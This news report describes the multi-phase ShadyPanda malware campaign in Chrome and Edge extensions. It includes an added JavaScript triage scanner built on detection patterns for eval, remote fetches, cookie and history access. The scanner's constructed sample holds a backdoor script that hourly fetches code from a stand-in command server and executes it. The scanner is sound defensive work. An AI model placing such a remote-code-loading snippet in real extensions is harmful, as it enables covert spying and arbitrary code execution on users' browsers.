A years-long malware campaign dubbed “ShadyPanda” has compromised more than 4.3 million Chrome and Edge browsers through extensions that initially appeared to be legitimate tools. The operation, detailed by researchers at Koi Security, ran in four phases that gradually transformed benign add-ons into powerful spyware.
Koi reports that 145 extensions (20 for Chrome and 125 for Microsoft Edge) have been linked to the campaign since its origins in 2018. While Google has removed the malicious Chrome extensions from its Web Store, the operation remains active on the Microsoft Edge Add-ons platform, where one extension still lists 3 million installs.
ShadyPanda’s first malicious activity surfaced in 2023, when several wallpaper and productivity extensions began engaging in affiliate fraud. By injecting tracking codes for major sites including eBay, Booking.com, and Amazon, the operators secretly monetized users’ purchases.
The campaign expanded in early 2024 with an extension called Infinity V+, which began hijacking search queries. According to Koi, the add-on redirected searches to a rogue engine, exfiltrated cookies, and transmitted captured queries to attacker-controlled domains.
In the next phase, five previously trusted extensions received updates that introduced a hidden backdoor. Each infected browser began running a remote code execution framework that checked an attacker server every hour for new commands, fetched arbitrary JavaScript, and executed it with full browser privileges. The extensions also exfiltrated browsing history, device fingerprints, and persistent identifiers using encrypted channels.
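The backdoor phase described above combines a handful of traits that a reviewer can check for statically before an extension is installed or allowed by policy: broad host permissions, a recurring schedule, a fetch to a remote server, and dynamic execution of whatever comes back. The triage scanner below is an added example, not code from Koi Security or from the article; the function names (`scanExtension`, `SIGNALS`), the scoring weights, and the two sample packages (including the `example.invalid` host) are constructed assumptions for illustration.

```javascript
// Added example (not from Koi Security or the article): a small static
// triage scanner for unpacked browser-extension packages. It flags the
// traits attributed to the ShadyPanda backdoor phase: broad host access,
// periodic scheduling, remote fetches, and dynamic code execution.
// Names, weights and the sample packages below are assumptions.

const SIGNALS = [
  { id: "dynamic-eval",   re: /\beval\s*\(|new\s+Function\s*\(/,       weight: 4,
    why: "executes code built at runtime (needed to run fetched JavaScript)" },
  { id: "remote-fetch",   re: /\b(fetch|XMLHttpRequest)\b/,             weight: 1,
    why: "contacts a remote server" },
  { id: "periodic-timer", re: /chrome\.alarms\.create|setInterval\s*\(/, weight: 1,
    why: "schedules recurring work (e.g. hourly command polling)" },
  { id: "history-access", re: /chrome\.history\.(search|getVisits)/,    weight: 2,
    why: "reads browsing history" },
  { id: "cookie-access",  re: /chrome\.cookies\.getAll/,               weight: 2,
    why: "reads cookies across sites" },
];

// Manifest permissions that widen what injected code or exfiltration can reach.
const RISKY_PERMISSIONS = new Set([
  "<all_urls>", "history", "cookies", "tabs", "webRequest", "scripting",
]);

// pkg = { manifest: <parsed manifest.json>, sources: { filename: sourceText } }
function scanExtension(pkg) {
  const findings = [];
  const m = pkg.manifest || {};
  const perms = [...(m.permissions || []), ...(m.host_permissions || [])];
  for (const p of perms) {
    if (RISKY_PERMISSIONS.has(p) || /^\*:\/\/\*\//.test(p)) {
      findings.push({ id: "broad-permission", file: "manifest.json", detail: p, weight: 1 });
    }
  }
  for (const [file, src] of Object.entries(pkg.sources || {})) {
    for (const s of SIGNALS) {
      if (s.re.test(src)) findings.push({ id: s.id, file, detail: s.why, weight: s.weight });
    }
  }
  // "remote fetch" together with "dynamic eval" is the remote-code-loading
  // pattern itself, so it is scored above the sum of its parts.
  const ids = new Set(findings.map((f) => f.id));
  if (ids.has("remote-fetch") && ids.has("dynamic-eval")) {
    findings.push({ id: "remote-code-loading", file: "*",
      detail: "fetched text can reach eval/Function", weight: 5 });
  }
  const score = findings.reduce((n, f) => n + f.weight, 0);
  const verdict = score >= 8 ? "review-before-install" : score >= 3 ? "suspicious" : "low";
  return { score, verdict, findings };
}

// Constructed sample mirroring the article's description; not a real extension.
const SAMPLE_PKG = {
  manifest: {
    manifest_version: 3,
    name: "Wallpaper Gallery (constructed sample)",
    permissions: ["alarms", "history", "cookies", "storage"],
    host_permissions: ["<all_urls>"],
  },
  sources: {
    "background.js": [
      'chrome.alarms.create("sync", { periodInMinutes: 60 });',
      "chrome.alarms.onAlarm.addListener(async () => {",
      '  const code = await (await fetch("https://c2.example.invalid/task")).text();',
      "  new Function(code)();",
      '  chrome.history.search({ text: "", maxResults: 1000 }, () => {});',
      "});",
    ].join("\n"),
  },
};

// Constructed benign control package.
const BENIGN_PKG = {
  manifest: { manifest_version: 3, name: "Counter (constructed sample)", permissions: ["storage"] },
  sources: { "popup.js": 'chrome.storage.local.get("n", (v) => console.log(v));' },
};

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(scanExtension(SAMPLE_PKG), null, 2));
  console.log(JSON.stringify(scanExtension(BENIGN_PKG), null, 2));
}
```

The scanner is deliberately a triage aid, not a verdict: a legitimate extension can match several signals on its own, so the weight is concentrated on the co-occurrence of a remote fetch and dynamic execution, which is the property a store policy or an enterprise allow-list review most wants to catch. Running it over every update of an already-approved extension, rather than only at first approval, is what would have surfaced the phase described above, where trusted add-ons turned malicious through an update.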
The final phase, still active today, involves five Edge extensions released in 2023 under the publisher name Starlab Technology. The add-ons have amassed roughly 4 million installs and, according to researchers, contain an embedded spyware module that collects browsing data and sends it to 17 servers located in China.